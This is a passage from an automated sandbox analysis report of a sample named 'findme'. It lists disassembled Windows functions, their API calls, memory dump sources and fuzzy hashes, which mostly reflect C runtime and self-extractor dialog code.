                    • Instruction ID: e76c741c18fd41c60a4d9c096939ce99766ebc9ca04db992d49f1ef91d923e3d
                    • Opcode Fuzzy Hash: ba22d8490f9a9fcc8a2f2b15f300e9d7b0bf82d6dc2f94f3636aef9cc0b20198
                    • Instruction Fuzzy Hash: B631AE35004200EFCB619F65DC4CF6B7BA8EF48715F00455AFE49AA252CB38D91ADB69
                    Function 004EBFB5 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004EBF79: _free.LIBCMT ref: 004EBFA2
                    • _free.LIBCMT ref: 004EC003
                      • Part of subcall function 004E84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,004EBFA7,004F3958,00000000,004F3958,00000000,?,004EBFCE,004F3958,00000007,004F3958,?,004EC3CB,004F3958), ref: 004E84F4
                      • Part of subcall function 004E84DE: GetLastError.KERNEL32(004F3958,?,004EBFA7,004F3958,00000000,004F3958,00000000,?,004EBFCE,004F3958,00000007,004F3958,?,004EC3CB,004F3958,004F3958), ref: 004E8506
                    • _free.LIBCMT ref: 004EC00E
                    • _free.LIBCMT ref: 004EC019
                    • _free.LIBCMT ref: 004EC06D
                    • _free.LIBCMT ref: 004EC078
                    • _free.LIBCMT ref: 004EC083
                    • _free.LIBCMT ref: 004EC08E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                    • Instruction ID: be8127e190b325f11eeb350bab016159fa42ace7f7b5fb48a5f7c382acbdaab4
                    • Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                    • Instruction Fuzzy Hash: ED112171550B54F6DA20B7B3CC06FCBB79DEF00705F40881EB69DA6492DB69F9048AD4
                    Function 004E20CA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetLastError.KERNEL32(?,?,004E20C1,004DFB12), ref: 004E20D8
                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004E20E6
                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004E20FF
                    • SetLastError.KERNEL32(00000000,?,004E20C1,004DFB12), ref: 004E2151
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ErrorLastValue___vcrt_
                    • String ID:
                    • API String ID: 3852720340-0
                    • Opcode ID: e6a1613d94bd4af1890e25a83b34d49f2b622b85b542e2696b129a9e43295305
                    • Instruction ID: 9e9937efca5368ddb844ec75a6a5ac6600fc5632a7235de68da4dcb1f6bac521
                    • Opcode Fuzzy Hash: e6a1613d94bd4af1890e25a83b34d49f2b622b85b542e2696b129a9e43295305
                    • Instruction Fuzzy Hash: 8A01F1322097566EF6252FB77C8993B6A4DEB1173B721063FF610952F0EE994E12910C
                    Function 004E9029 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetLastError.KERNEL32(?,00500EE8,00000200,004E895F,004E58FE,?,?,?,?,004CD25E,?,02C03C18,00000063,00000004,004CCFE0,?), ref: 004E902E
                    • _free.LIBCMT ref: 004E9063
                    • _free.LIBCMT ref: 004E908A
                    • SetLastError.KERNEL32(00000000,004F3958,00000050,00500EE8), ref: 004E9097
                    • SetLastError.KERNEL32(00000000,004F3958,00000050,00500EE8), ref: 004E90A0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ErrorLast$_free
                    • String ID: XO
                    • API String ID: 3170660625-962008992
                    • Opcode ID: 5be026ba621e1974b0ddca70d7f4c1850b2c0641e08fbd18cf27c52ab11196ca
                    • Instruction ID: a8fc0ba358a0d891cb479522f50361304141c1bc051ac357477b707339e55c07
                    • Opcode Fuzzy Hash: 5be026ba621e1974b0ddca70d7f4c1850b2c0641e08fbd18cf27c52ab11196ca
                    • Instruction Fuzzy Hash: 81014472101A806F872227376C8593B262D9FC137B360012FF509E22E2EE6CCC22916E
                    Function 004DDC9A Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID:
                    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                    • API String ID: 0-1718035505
                    • Opcode ID: 455a38d457549e16aa455ba0281f02a3a9f9d4292157821bc2e6b68b0c777ad2
                    • Instruction ID: e9314e9f2e7cfa9d5eead7fcaa014a33d20e0d2f96010a6d1038b366dc6d61bf
                    • Opcode Fuzzy Hash: 455a38d457549e16aa455ba0281f02a3a9f9d4292157821bc2e6b68b0c777ad2
                    • Instruction Fuzzy Hash: 2501F971F522225B4F305E786CA57B76794AE42B13720113BE601E3380DA59CC46D69C
                    Function 004E8060 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON
                    Download Yara Rule
                    APIs
                    • _free.LIBCMT ref: 004E807E
                      • Part of subcall function 004E84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,004EBFA7,004F3958,00000000,004F3958,00000000,?,004EBFCE,004F3958,00000007,004F3958,?,004EC3CB,004F3958), ref: 004E84F4
                      • Part of subcall function 004E84DE: GetLastError.KERNEL32(004F3958,?,004EBFA7,004F3958,00000000,004F3958,00000000,?,004EBFCE,004F3958,00000007,004F3958,?,004EC3CB,004F3958,004F3958), ref: 004E8506
                    • _free.LIBCMT ref: 004E8090
                    • _free.LIBCMT ref: 004E80A3
                    • _free.LIBCMT ref: 004E80B4
                    • _free.LIBCMT ref: 004E80C5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID: O
                    • API String ID: 776569668-4042636462
                    • Opcode ID: 660090fa33e49c6b91a6d8035c79f4cac91920c364b2ac98c0689f09122e5fa3
                    • Instruction ID: 94631bdade5b6b07b2c7bb59b75d5ba97a369234bcb1658cc8e28e529d951ab7
                    • Opcode Fuzzy Hash: 660090fa33e49c6b91a6d8035c79f4cac91920c364b2ac98c0689f09122e5fa3
                    • Instruction Fuzzy Hash: 12F01D78801D699B8B216B17BC0141B3666FB3672230A461FF40896EB1DF391456AFDD
                    Function 004D0CBE Relevance: 9.1, APIs: 6, Instructions: 94timeCOMMON
                    Download Yara Rule
                    APIs
                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 004D0D0D
                      • Part of subcall function 004CACF5: GetVersionExW.KERNEL32(?), ref: 004CAD1A
                    • LocalFileTimeToFileTime.KERNEL32(?,004D0CB8), ref: 004D0D31
                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 004D0D47
                    • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 004D0D56
                    • SystemTimeToFileTime.KERNEL32(?,004D0CB8), ref: 004D0D64
                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 004D0D72
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: Time$File$System$Local$SpecificVersion
                    • String ID:
                    • API String ID: 2092733347-0
                    • Opcode ID: de0fcf04ab4afbf49cb0f9d1e44a2350d63e9ee4aaa1e2484347d011dd5cd6ca
                    • Instruction ID: 5f8ebf72dc4089f24441258a0072a75c4b4bdd04978065536870b16c3c3b23dd
                    • Opcode Fuzzy Hash: de0fcf04ab4afbf49cb0f9d1e44a2350d63e9ee4aaa1e2484347d011dd5cd6ca
                    • Instruction Fuzzy Hash: 3231F87A90020AEBCB00DFE5D8859EFBBB8FF58700B04442BE955E3210E7349655CB69
                    Function 004D91B0 Relevance: 9.1, APIs: 6, Instructions: 89COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: _memcmp
                    • String ID:
                    • API String ID: 2931989736-0
                    • Opcode ID: e2d68e2375dacfd9f74163fba3970880d6848446b048c6c3160d0b3f9807155d
                    • Instruction ID: fd515fd40ae7848dac23da1eeaea704440a979e99b8a35fe37f6df3661cffcab
                    • Opcode Fuzzy Hash: e2d68e2375dacfd9f74163fba3970880d6848446b048c6c3160d0b3f9807155d
                    • Instruction Fuzzy Hash: F021B57160010EBBD7149E15CC91F3B77AEAF90798B20856BFD0ADB301E278ED458699
                    Function 004DD2E6 Relevance: 9.0, APIs: 6, Instructions: 43windowsynchronizationCOMMON
                    Download Yara Rule
                    APIs
                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 004DD2F2
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 004DD30C
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004DD31D
                    • TranslateMessage.USER32(?), ref: 004DD327
                    • DispatchMessageW.USER32(?), ref: 004DD331
                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 004DD33C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                    • String ID:
                    • API String ID: 2148572870-0
                    • Opcode ID: 0a6fd2e0740e47fc67d748ffd05f0385d978cac07302c2e5dc868aa8ace1190f
                    • Instruction ID: 26f641b14db6f12a395990da46aaa4157aa99653e3efc7fa0c2322609b037191
                    • Opcode Fuzzy Hash: 0a6fd2e0740e47fc67d748ffd05f0385d978cac07302c2e5dc868aa8ace1190f
                    • Instruction Fuzzy Hash: 8BF03C72E01119BBCB205FA1DC4CEEBBF6DEF52391F008023FA06D2110D6388556C7A1
                    Function 004DC40E Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                    Download Yara Rule
                    APIs
                    • _wcschr.LIBVCRUNTIME ref: 004DC435
                      • Part of subcall function 004D17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,004CBB05,00000000,.exe,?,?,00000800,?,?,004D85DF,?), ref: 004D17C2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: CompareString_wcschr
                    • String ID: <$HIDE$MAX$MIN
                    • API String ID: 2548945186-3358265660
                    • Opcode ID: 7ec9ae8105aa3288e9626f62b8292332461ea93d8b6dbbcf55a9585571a97ad6
                    • Instruction ID: 763aa284981139156bef4bf6853e34f13faa5a977ff1fa155d0b69d21150c418
                    • Opcode Fuzzy Hash: 7ec9ae8105aa3288e9626f62b8292332461ea93d8b6dbbcf55a9585571a97ad6
                    • Instruction Fuzzy Hash: 2631827690020EAADF21DA55DCA5FEB77BCEB14304F0041A7FA09D6350EBB89EC4CA55
                    Function 004DA990 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 63COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004C130B: GetDlgItem.USER32(00000000,00003021), ref: 004C134F
                      • Part of subcall function 004C130B: SetWindowTextW.USER32(00000000,004F35B4), ref: 004C1365
                    • EndDialog.USER32(?,00000001), ref: 004DA9DE
                    • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 004DA9F6
                    • SetDlgItemTextW.USER32(?,00000067,?), ref: 004DAA24
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ItemText$DialogWindow
                    • String ID: GETPASSWORD1$xjQ
                    • API String ID: 445417207-1163178184
                    • Opcode ID: 4dfb49f8e08fb9dcc0ae122f3a6d40c1d6e86bcaf3a29deff8658b664fd8f596
                    • Instruction ID: 79e6495986586384306549b05516f5a72f9ad43fd0af3fa23c2e5a58c2fa51a6
                    • Opcode Fuzzy Hash: 4dfb49f8e08fb9dcc0ae122f3a6d40c1d6e86bcaf3a29deff8658b664fd8f596
                    • Instruction Fuzzy Hash: 931188339001187ADB309A659D19FFB3B6CEF0A304F000467FA45F2390C2688D66E276
                    Function 004DADED Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59windowCOMMON
                    Download Yara Rule
                    APIs
                    • LoadBitmapW.USER32(00000065), ref: 004DADFD
                    • GetObjectW.GDI32(00000000,00000018,?), ref: 004DAE22
                    • DeleteObject.GDI32(00000000), ref: 004DAE54
                    • DeleteObject.GDI32(00000000), ref: 004DAE77
                      • Part of subcall function 004D9E1C: FindResourceW.KERNEL32(004DAE4D,PNG,?,?,?,004DAE4D,00000066), ref: 004D9E2E
                      • Part of subcall function 004D9E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,004DAE4D,00000066), ref: 004D9E46
                      • Part of subcall function 004D9E1C: LoadResource.KERNEL32(00000000,?,?,?,004DAE4D,00000066), ref: 004D9E59
                      • Part of subcall function 004D9E1C: LockResource.KERNEL32(00000000,?,?,?,004DAE4D,00000066), ref: 004D9E64
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                    • String ID: ]
                    • API String ID: 142272564-3352871620
                    • Opcode ID: 95c94ea138907a26d1f2992cef0acd9db32a08cdf8749813a49642e7acf79c56
                    • Instruction ID: c49eb13480750316d48beeaa330ee842523595cde006b120407aee67c073b8a0
                    • Opcode Fuzzy Hash: 95c94ea138907a26d1f2992cef0acd9db32a08cdf8749813a49642e7acf79c56
                    • Instruction Fuzzy Hash: 77010836580215A6C71067659C29B7F77AA9F82B41F08001BBD00F7391DB394C26E2B6
                    Function 004DCC90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004C130B: GetDlgItem.USER32(00000000,00003021), ref: 004C134F
                      • Part of subcall function 004C130B: SetWindowTextW.USER32(00000000,004F35B4), ref: 004C1365
                    • EndDialog.USER32(?,00000001), ref: 004DCCDB
                    • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 004DCCF1
                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 004DCD05
                    • SetDlgItemTextW.USER32(?,00000068), ref: 004DCD14
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ItemText$DialogWindow
                    • String ID: RENAMEDLG
                    • API String ID: 445417207-3299779563
                    • Opcode ID: dd607b143e8d97ea609942a8c9b7036a8a473617a505d291d0ac92039c62df3c
                    • Instruction ID: fa5c923a7527c8de714876dbdadbacc6824b9c9b0bdefb76ec3c712a3e84f3e3
                    • Opcode Fuzzy Hash: dd607b143e8d97ea609942a8c9b7036a8a473617a505d291d0ac92039c62df3c
                    • Instruction Fuzzy Hash: 5B012D322942117AD1214F645C59F673B9DEBA7B02F204413F345A22E0C6795909E77D
                    Function 004E2503 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • ___BuildCatchObject.LIBVCRUNTIME ref: 004E251A
                      • Part of subcall function 004E2B52: ___AdjustPointer.LIBCMT ref: 004E2B9C
                    • _UnwindNestedFrames.LIBCMT ref: 004E2531
                    • ___FrameUnwindToState.LIBVCRUNTIME ref: 004E2543
                    • CallCatchBlock.LIBVCRUNTIME ref: 004E2567
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                    • String ID: /)N
                    • API String ID: 2633735394-426912691
                    • Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                    • Instruction ID: cfdfbbbc005b6c4c47ae94e859329a45aa5a8a3cd3e45f1fb7c264864b9a8821
                    • Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                    • Instruction Fuzzy Hash: C1016D32000149BBCF125F56CE01EDA3BBAFF58715F05401AFD1861120C379E861DBA9
                    Function 004E75C2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004E7573,00000000,?,004E7513,00000000,004FBAD8,0000000C,004E766A,00000000,00000002), ref: 004E75E2
                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004E75F5
                    • FreeLibrary.KERNEL32(00000000,?,?,?,004E7573,00000000,?,004E7513,00000000,004FBAD8,0000000C,004E766A,00000000,00000002), ref: 004E7618
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AddressFreeHandleLibraryModuleProc
                    • String ID: CorExitProcess$mscoree.dll
                    • API String ID: 4061214504-1276376045
                    • Opcode ID: 2a8a42217b600f6f821ed40a0ff43a12f23d60e75efcbf2e825cf1478727b589
                    • Instruction ID: c507f19b83a9da8cf6dc336f9f92e2692ef9f4ce94676cb80bb73090a9b43115
                    • Opcode Fuzzy Hash: 2a8a42217b600f6f821ed40a0ff43a12f23d60e75efcbf2e825cf1478727b589
                    • Instruction Fuzzy Hash: 27F0A43060450CBBDB119F65DC09BAEBFB8EF04727F1000AAF805A6250DF348A50CA58
                    Function 004CEB73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004D0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 004D00A0
                      • Part of subcall function 004D0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,004CEB86,Crypt32.dll,00000000,004CEC0A,?,?,004CEBEC,?,?,?), ref: 004D00C2
                    • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 004CEB92
                    • GetProcAddress.KERNEL32(005081C0,CryptUnprotectMemory), ref: 004CEBA2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
